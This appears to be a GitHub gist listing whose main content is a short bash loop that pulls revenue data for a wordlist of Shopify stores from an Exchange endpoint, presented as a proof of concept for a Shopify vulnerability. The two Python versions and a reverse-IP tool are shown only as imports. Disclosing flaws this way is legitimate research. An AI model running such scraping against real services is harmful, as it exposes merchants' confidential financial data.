Skip to content

Instantly share code, notes, and snippets.

View ayoubfathi's full-sized avatar

Ayoub FATHI ayoubfathi

View GitHub Profile
#!/bin/bash
for i in $(cat stores-exchange.txt);
do
j=$(curl -s "https://exchangemarketplace.com/shops/$i/revenue_data"
| dap json + insert store=$i.myshopify.com + json)
echo $j | jq -c . >> sales_data.txt
done
@ayoubfathi
ayoubfathi / exploit.py
Last active April 25, 2019 22:59
PoC for shopify vulnerability
import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
@ayoubfathi
ayoubfathi / shopify.py
Last active April 25, 2019 22:59
Given a wordlist this will look for revenue data of shopify stores
import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
@ayoubfathi
ayoubfathi / revip.py
Created April 13, 2019 07:01
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'